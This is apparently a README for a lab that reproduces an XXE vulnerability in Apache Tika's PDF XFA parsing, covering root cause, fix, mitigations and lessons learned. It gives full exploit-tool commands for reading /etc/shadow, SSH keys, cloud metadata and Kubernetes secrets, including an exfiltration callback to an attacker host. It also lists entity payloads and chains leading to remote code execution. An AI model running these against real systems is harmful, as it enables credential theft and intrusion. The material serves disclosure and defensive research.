CVE-2025-66516 is a critical XML External Entity (XXE) injection vulnerability in Apache Tika with a CVSS score of 10.0 (maximum severity). The vulnerability allows remote attackers to read arbitrary files, perform Server-Side Request Forgery (SSRF), and exfiltrate sensitive data by uploading a specially crafted PDF document containing malicious XFA (XML Forms Architecture) content.
| Attribute | Value |
|---|---|
| CVE ID | CVE-2025-66516 |
| CVSS Score | 10.0 (Critical) |
| Disclosed | December 4, 2025 |
| Vendor | Apache Software Foundation |
| Affected Product | Apache Tika |
| Attack Vector | Network (Remote) |
| Authentication | None Required |
| Component | Vulnerable Versions | Fixed Version |
|---|---|---|
| tika-core | 1.13 - 3.2.1 | 3.2.2+ |
| tika-parser-pdf-module | 2.0.0 - 3.2.1 | 3.2.2+ |
| tika-parsers | 1.13 - 1.28.5 | 2.0.0+ |
Important: This CVE supersedes CVE-2025-54988, which incorrectly identified only the PDF module as vulnerable. The actual vulnerability resides in tika-core.
The vulnerability is an XML External Entity (XXE) injection flaw in how Apache Tika processes XFA (XML Forms Architecture) data within PDF documents.
The Problem: Tika relies on underlying Java XML parsers (specifically a StAX parser) to read XFA XML content. Vulnerable versions failed to correctly configure the parser to disable external entity resolution. When the parser encounters an external entity request (like SYSTEM "file:///etc/passwd"), it resolves and returns the file contents.
Location: The bug exists in XMLReaderUtils.getXMLInputFactory() in tika-core:
public static XMLInputFactory getXMLInputFactory() {
XMLInputFactory factory = XMLInputFactory.newFactory();
tryToSetStaxProperty(factory, XMLInputFactory.IS_NAMESPACE_AWARE, true);
tryToSetStaxProperty(factory, XMLInputFactory.IS_VALIDATING, false);
factory.setXMLResolver(IGNORING_STAX_ENTITY_RESOLVER); // <-- Ineffective
return factory;
}The IGNORING_STAX_ENTITY_RESOLVER was intended to block XXE by returning an empty result, but it returned a String instead of the expected InputStream. The JDK's default StAX parser silently ignored this incorrect return type and fell back to default behavior, which resolves external entities.
The fix explicitly disables DTD and external entity support at the factory level:
tryToSetStaxProperty(factory, XMLInputFactory.SUPPORT_DTD, false);
tryToSetStaxProperty(factory, XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);Additionally, the resolver was changed to return a proper InputStream type.
In the Java ecosystem, multiple XML parser libraries exist. Applications use whichever parser is configured or found first on the classpath.
What is Woodstox? Woodstox is a high-performance, open-source StAX XML parser commonly bundled with Java applications.
How it provides protection: By design (not by accident), Woodstox's implementation correctly handles the XMLResolver return type. When Woodstox receives the string return value from IGNORING_STAX_ENTITY_RESOLVER, it treats it as valid empty content, effectively blocking the XXE.
Critical distinction:
tika-server-standard.jarbundles Woodstox - NOT VULNERABLEtika-core+ parser modules (embedded usage) does NOT bundle Woodstox - VULNERABLE- Applications using JDK's default StAX parser - VULNERABLE
# 1. Start the lab environment
docker-compose up -d --build
# 2. Test against vulnerable Tika (JDK StAX, port 9997)
python poc/exploit.py --url http://localhost:9997 --check
# 3. Extract /etc/passwd
python poc/exploit.py --url http://localhost:9997 --file /etc/passwd
# 4. Compare with protected Tika (Woodstox, port 9998)
python poc/exploit.py --url http://localhost:9998 --checkCVE-2025-66516/
|-- docker-compose.yml # Lab orchestration
|-- vulnerable-tika/
| |-- Dockerfile # Tika with Woodstox (protected)
| +-- Dockerfile.jdk-stax # Tika without Woodstox (VULNERABLE)
|-- webapp/
| |-- Dockerfile
| |-- app.py # Flask upload application
| +-- templates/
|-- poc/
| |-- exploit.py # Automated exploitation tool
| +-- generate_payload.py # Malicious PDF generator
+-- README.md
| Service | Port | Description |
|---|---|---|
| Web Application | 8080 | Document upload frontend |
| Tika (Woodstox) | 9998 | Protected - NOT vulnerable |
| Tika (JDK StAX) | 9997 | VULNERABLE - No Woodstox |
| Attacker Listener | 9999 | HTTP server for OOB testing |
docker-compose up -d --buildFull-chain exploitation with automatic payload generation and data extraction.
# Check if target is vulnerable
python poc/exploit.py --url http://target:9998 --check
# Read local files
python poc/exploit.py --url http://target:9998 --file /etc/passwd
python poc/exploit.py --url http://target:9998 --file /etc/shadow
# AWS metadata theft (EC2 instances)
python poc/exploit.py --url http://target:9998 --aws-metadata
# Kubernetes secrets
python poc/exploit.py --url http://target:9998 --k8s-secrets
# SSRF to internal services
python poc/exploit.py --url http://target:9998 --ssrf http://internal:8080/admin
# Save extracted data
python poc/exploit.py --url http://target:9998 --file /etc/passwd --save loot.txtGenerates malicious PDF files for manual testing or integration with other tools.
# Generate payload for specific file
python poc/generate_payload.py --target /etc/passwd --output exploit.pdf
# Generate SSRF payload
python poc/generate_payload.py --target http://169.254.169.254/latest/meta-data/ --output ssrf.pdf
# Generate OOB exfiltration payload
python poc/generate_payload.py --target /etc/passwd --callback http://attacker:8080 --output oob.pdf
# Use attack mode presets
python poc/generate_payload.py --mode aws_metadata --output aws.pdf
python poc/generate_payload.py --mode k8s_secrets --all-targets --output ./payloads/
# List available attack modes
python poc/generate_payload.py --list-modesAvailable Attack Modes:
file_read- Read local files (/etc/passwd, /etc/shadow, etc.)ssh_keys- Steal SSH private keysaws_metadata- AWS EC2 metadata and IAM credentialsgcp_metadata- GCP service account tokensazure_metadata- Azure managed identity tokensk8s_secrets- Kubernetes service account credentialswebapp_configs- Common web application configsssrf_internal- Probe internal services
Testing against Tika 2.9.2 without Woodstox (simulating embedded deployments):
| Test | Result |
|---|---|
| XFA Detection | [PASS] PDF recognized as having XFA |
| XFA Parsing | [PASS] XFA content extracted |
| XXE File Read | [VULNERABLE] /etc/passwd contents exfiltrated |
| XXE SSRF | [VULNERABLE] External requests sent |
Proof of Exploitation:
<li fieldName="data">data: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
Testing against Tika 2.9.2 with Woodstox (standard tika-server-standard.jar):
| Test | Result |
|---|---|
| XFA Detection | [PASS] PDF recognized as having XFA |
| XFA Parsing | [PASS] XFA content extracted |
| XXE File Read | [BLOCKED] External entities not resolved |
| XXE SSRF | [BLOCKED] No outbound connections |
Output shows empty entity:
<li fieldName="data">data: </li>
The vulnerability is real and critical. Exploitation depends on the StAX implementation:
- [PROTECTED]
tika-server-standard.jar- Bundled Woodstox blocks XXE - [VULNERABLE] Embedded Tika (tika-core + parsers) - Uses JDK StAX by default
- [VULNERABLE] Custom deployments without Woodstox
- [VULNERABLE] Enterprise integrations (Elasticsearch, Solr, Alfresco) - Often use embedded Tika
XXE is fundamentally a file read/SSRF vulnerability, not direct RCE. However, it enables several attack paths:
| Attack | Payload Example |
|---|---|
| File Read | SYSTEM "file:///etc/passwd" |
| SSRF | SYSTEM "http://internal:8080/admin" |
| AWS Metadata | SYSTEM "http://169.254.169.254/latest/meta-data/" |
| Scenario | Attack Path |
|---|---|
| AWS EC2 | XXE -> SSRF to metadata -> IAM credentials -> AWS CLI RCE |
| Kubernetes | XXE -> Read service account token -> kubectl exec |
| Internal Jenkins | XXE -> SSRF to script console -> Groovy RCE |
| Database | XXE -> Read config files -> Database access |
| SSH | XXE -> Read SSH keys -> Remote shell access |
-
Upgrade Apache Tika to version 3.2.2 or later
<dependency> <groupId>org.apache.tika</groupId> <artifactId>tika-core</artifactId> <version>3.2.2</version> </dependency>
-
Verify all Tika components are updated (tika-core AND parser modules)
| Deployment Type | Risk Level |
|---|---|
| tika-server-standard.jar | LOW - Woodstox mitigates |
| Embedded Tika (library usage) | HIGH - Likely vulnerable |
| Custom without Woodstox | HIGH - Vulnerable |
- Input Validation - Validate uploaded file types
- Network Segmentation - Isolate Tika processing
- Least Privilege - Minimal filesystem permissions
- Monitoring - Alert on unusual file access
Issue 1: Initial exploit did not work
- XFA was detected but XXE never triggered
- Spent time debugging payload structure
Issue 2: Multiple XML declarations error
- Error:
WstxParsingException: Illegal processing instruction target ("xml") - Cause: XFA streams were each including XML declarations
- Fix: Only include declaration in preamble, not sub-streams
Issue 3: The Woodstox mystery
- All payloads failed against tika-server-standard.jar
- Discovered Woodstox was bundled and blocking XXE
- Created Dockerfile.jdk-stax to test without Woodstox
Issue 4: Testing wrong configuration
- Wasted time on protected configuration
- Lesson: Understand the full dependency tree before testing
- CVSS scores need context - Environmental factors affect exploitability
- Test minimal configurations - Don't assume bundled dependencies
- XML parsers vary wildly - Same code behaves differently with different parsers
- Embedded != Server - Library usage often has different dependencies
- Error messages are clues - Parser exceptions reveal implementation details
| Date | Event |
|---|---|
| August 2025 | CVE-2025-54988 disclosed (incomplete scope) |
| December 4, 2025 | CVE-2025-66516 published (full scope identified) |
| December 4, 2025 | Apache Tika 3.2.2 released with fix |
This lab environment and proof-of-concept code are provided for authorized security testing, educational purposes, and defensive research only.
Do not use these tools against systems without explicit written authorization.
This research material is provided for educational purposes. Use responsibly.